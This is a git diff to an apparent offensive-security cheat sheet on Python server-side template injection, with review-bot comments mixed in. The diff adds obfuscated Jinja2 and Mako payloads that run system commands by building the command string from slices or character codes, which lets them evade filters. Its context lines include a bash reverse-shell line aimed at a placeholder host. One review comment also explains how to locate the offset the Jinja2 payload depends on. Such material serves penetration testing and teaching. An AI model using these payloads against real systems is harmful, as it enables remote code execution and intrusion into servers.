diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 056d6057..3bf8b764 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -26,12 +26,14 @@ - [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file) + - [Jinja2 - Remote Command Execution with Obfuscation](#jinja2---remote-command-execution-with-obfuscation) - [Jinja2 - Filter Bypass](#jinja2---filter-bypass) - [Tornado](#tornado) - [Tornado - Basic Injection](#tornado---basic-injection) - [Tornado - Remote Command Execution](#tornado---remote-command-execution) - [Mako](#mako) - [Mako - Remote Command Execution](#mako---remote-command-execution) + - [Mako - Remote Command Execution with Obfuscation](#mako---remote-command-execution-with-obfuscation) - [References](#references) ## Templating Libraries @@ -260,6 +262,17 @@ Simple modification of the payload to clean up output and facilitate command inp {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` +### Jinja2 - Remote Command Execution with Obfuscation + +Write the string: `id` using the index position of a known existing string (the index value may vary depending on the target): `{{self.__init__.__globals__.__str__()[1786:1788]}}`. + +Execute the system command `id`: +```python +{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + ### Jinja2 - Filter Bypass ```python 
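Review bot: the slice `[1786:1788]` hard-coded in both Jinja2 payloads is an environment-specific offset, and the section only says it "may vary depending on the target"; tell the reader how to recover it, e.g. render `{{self.__init__.__globals__.__str__()}}` once and locate the characters `id` (or whatever substring the command needs) in the dumped output before fixing the slice, since the position shifts with the Python, Jinja2 and imported-module versions on the target. Minor: "Reference and explanation of payload can be found [here]" should read "of the payload", and because the same URL is added to the References section in this PR, a descriptive link text (or a pointer to the References entry) would match the rest of the file better than "here".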
@@ -400,6 +413,21 @@ PoC : ``` +### Mako - Remote Command Execution with Obfuscation + +In Mako, the following payload can be used to generates the string "id": `${str().join(chr(i)for(i)in[105,100])}`. + +Execute the system command `id`: +```python +${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()} +``` + +```python +<%import os%>${os.popen(str().join(chr(i)for(i)in[105,100])).read()} +``` + +Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). + ## References - [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) @@ -407,3 +435,4 @@ PoC : - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
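Review bot: "the following payload can be used to generates the string" should read "can be used to generate the string". The second payload, `<%import os%>${os.popen(...)}`, imports `os` by its plain name, so the only obfuscation it keeps is building `id` with `chr()`; either say explicitly that it only evades filtering of the command string (not of `import`/`os`), or keep it under the existing "Mako - Remote Command Execution" section so the "with Obfuscation" heading does not over-claim. Same "of payload" -> "of the payload" nit as in the Jinja2 section.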
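Review bot: the existing References list is ordered alphabetically by title (Cheatsheet..., Jinja2 template injection..., Python context free payloads..., The minefield...), so the new "Limitations are just an illusion ..." entry belongs between the Jinja2 and Python entries rather than appended after "The minefield ...". The entry itself follows the file's "[Title - Author - Date](url)" convention, so only its position needs to move.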